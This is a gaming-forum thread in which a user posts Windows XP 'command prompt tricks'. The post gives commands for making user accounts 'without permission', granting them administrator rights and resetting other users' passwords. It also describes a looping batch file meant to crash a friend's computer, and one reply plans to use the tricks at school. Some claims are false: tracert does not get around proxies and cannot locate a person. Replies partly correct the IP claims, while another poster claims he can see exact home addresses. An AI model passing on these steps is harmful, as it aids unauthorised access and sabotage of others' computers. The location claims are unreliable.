• Views 2,333
V

Valiant

Banned
Reaction score
Sin$
Command Prompt Tricks XP​

Getting around proxies

1) Go to start > run > type cmd then enter > tracert (Any website you want) > Last IP at the bottom "74.125.230.116" is the IP to that website

changing XP account passwords

2) Go to start > run > type cmd then enter > net user > net user (then the account you have for example dylan)

Finding anyone if the hole wide world if you know their IP address

3) Go to start > run > type cmd then enter > tracert (any site you want) > once traced it go to whatismyipaddress.com/ip-lookup > put the IP address in then submit > then you found out where they are

Crash your friends computer within a 1 minute

4) Open up notepad and type start start start start > then save it as hax.bat > then type hax.bat on the last line > this will make his computer crash if you send it to him and do not open it up when done it.

How to create a user on a system without permission

5)open up notepad and type www.Command.com and save it as cmd.bat, then next you do

start > run > cmd > then type "net user" _______ < (username) ______ < (password) /Add > so for example you type net user element 12345 /add.

Now you have a new user account I will now show you how to make any user as administrator

6) Start > run > cmd > then type net localgroup administrators ________ <(username) /Add

Now I will show you how to change the password of any user without knowing the current one

7) Start > run > cmd > then type net user ___ < (username) * (shift 8)

It should now ask for a new password so make one and confirm

8) net user _____ < (username) * > enter > then enter again > then you should be done :smile:

Operating System
  1. Windows
Alle

Alle

Your Boy
Platinum Record Experienced Veteran Grizzled Veteran
Reaction score
Sin$
I'm gonna use basically all of this tomorrow at school.

Thanks XD

ModsBABY HD

ModsBABY HD

Contributor
Reaction score
Sin$

3) Go to start > run > type cmd then enter > tracert (any site you want) > once traced it go to whatismyipaddress.com/ip-lookup > put the IP address in then submit > then you found out where they are

Just a small notice this does NOT give you the location of what your searching, It gives you the location of the internet provider for the IP Address. Sometimes you can be lucky and find out what state the person lives in but that's it.​

DanesxD

DanesxD

Reaction score
Sin$
i would try this but for 1 i have my own computer 2 me and my mom only have windows 7 but nice tut / post

Y

Yeshua

Enthusiast
Reaction score
Sin$
Just a small notice this does NOT give you the location of what your searching, It gives you the location of the internet provider for the IP Address. Sometimes you can be lucky and find out what state the person lives in but that's it.

Well for me I can find out exactly where they lives, I can even see their house on google maps.

ModsBABY HD

ModsBABY HD

Contributor
Reaction score
Sin$
Well for me I can find out exactly where they lives, I can even see their house on google maps.
I would love to see you do that. Because what i've been researching, it's not possible.

-eminem-

-eminem-

Enthusiast
Reaction score
Sin$

This sir, is untrue. You can see the general area for SOME ips. For MOST ips you see the area of the Internet Provider.

Y

Yeshua

Enthusiast
Reaction score
Sin$
I would love to see you do that. Because what i've been researching, it's not possible.

This sir, is untrue. You can see the general area for SOME ips. For MOST ips you see the area of the Internet Provider.

Well for me everytime someone access my website I can track down their exact address, or when someone is my peer on a torrent I can track down their address. And by track it down I mean it shows up for me.

-eminem-

-eminem-

Enthusiast
Reaction score
Sin$
Well for me everytime someone access my website I can track down their exact address, or when someone is my peer on a torrent I can track down their address. And by track it down I mean it shows up for me.

Whats your website. I will visit and then you tell me where i live.

Y

Yeshua

Enthusiast
Reaction score
Sin$
Whats your website. I will visit and then you tell me where i live.

Well right now it is down as I just upgraded my script, but try out my forum, at

Code:
http://ultimate-torrents.com/Forum/

And also go to my root.

xILemonHeadIx

xILemonHeadIx

Getting There
Reaction score
Sin$

This isn't finding anyone. This is tracing a web servers ip, not a persons and it does not show you the location of the server either, it shows you where the gateway is.

No you can't.

That isn't where they are living, nor where they are connected from. It is the location of the gateway. Tracing an ip is not accurate at all and you cannpt get a persons address from it, AT ALL.

J

jenniwiton80

Reaction score
Sin$
I want to make sure that no one get invade my window system as there are many important things stored in it. What are some safest methods, tips and tricks to do that and make it more secure from threats.
windows xp tricks

Top Bottom
Login
Register